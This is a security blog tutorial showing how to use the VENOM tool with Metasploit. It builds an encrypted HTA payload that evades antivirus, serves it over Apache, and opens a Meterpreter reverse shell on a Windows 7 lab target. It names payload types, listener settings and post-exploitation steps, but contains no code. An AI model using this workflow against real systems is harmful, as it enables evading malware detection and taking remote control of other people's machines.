VENOM – An Exploitation Tool to Bypass Anti Virus Detection with Encrypted Payloads
Nowadays many Malware and Payloads are using Encryption techniques and packing techniques using Packers to Evade the Anti Virus Software since AV is Difficult to detect the Encrypted and packed Malware and payload.
Here we are going to learn about generating Encrypted Payloads using VENOM – Metasploit Shellcode generator/compiler/listener tool.
According to the description of this VENOM, The script will use MSF venom (Metasploit) to generate shellcode in different formats ( c | python | ruby | dll | msi | hta-psh ), inject the shellcode generated into one function (example: python)
The python function will execute the shellcode in ram” and uses compilers like: gcc (gnu cross compiler) or mingw32 or pyinstaller to build the executable file, also starts a multi-handler to recipe the remote connection (reverse shell or meterpreter session).
Since this tool is not a default tool, we need to Download and Install it into your Kali Linux.
please use this link to Download VENOM from Sourceforge Website Download Link.
Once Downloaded the Tool Extracts the ZIP and runs the Tool. Here I kept the package on my Desktop.
Step 2:
After launching the tool, it will ask you to click ok to continue to proceed with further options.
Step 3:
The next Process will show you the information about the Option Built, Target Machine, payload format, and output.
The 20 Different Types of option builds shellcodes are listed here. we are using shellcode number 10 for this Demonstration.
so here we Chose Venom shellcode number 10 and press OK.
Step 4:
In This Step, we need to set up the Local host IP address. so enter your Local machine IP address for listening to the payload and press ok for the next setting information.
Once we have set our LHOST, it will ask you to Enter your LPORT . Provide your Desire LPORT number then Press OK.
Step 5:
Venom contains some Default msf payloads. Here we using “windows/meterpreter/reverse_tcp”
Step 6 :
Here you can provide the payload name that you’re going to generate. Once select the name press OK.
Step 7:
Once Encrypted Payload is Successfully Generated, then it will be stored in the output Folder of the Venom Package.
root/Desktop/shell/output/gbhackers.hta
Step 8:
I have done the scanning process for checking the Anti Virus Vendor Detection, after Successfully generating our Encryption Payload. so we have successfully Evade the AV Detection.
Here let us bypass the Victim using Metasploit with our Encrypted payload.
Step 9:
we need to start the Apache server to Deliver our Malicious Payload into the Victims Machine. once you select the server Click ok to Continue.
Step 10:
In this step, we need to concentrate on Post Exploitation Module. Here we can choose any one of the post Exploitation.
I need to gain access only to system information so I have chosen sysinfo.rc for the post-exploitation of the target machine.
since it’s an Optional one, you can even perform manually this Module then you can bypass the Victim using Metasploit.
Step 11:
Finally, I have generated a Meterpreter session using our Encrypted payload to my Target Windows 7 Machine.
Before starting the session handler, Make sure your payload has successfully been injected with your Target Machine.
I have Executed my payload to my Target machine using the Malicious URL(http://192.168.56.103)that has been generated by our payload Generated VENOM.
Before Playing with Metasploit, check your LPORT and LHOST Setting have been properly set for listening to the Session.
So Finally, I have Successfully Bypassed my Victims and taken over the Entire access of my Target Windows 7 Machine.
If you have any Further Doubts and Queries, Kindly leave your comments. Happy Hacking.
Disclaimer
This article is only for an Educational purpose. Any actions and or activities related to the material contained within this Website is solely your responsibility. The misuse of the information in this website can result in criminal charges brought against the persons in question. The Authors andwww.gbhackers.com will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.
View Comments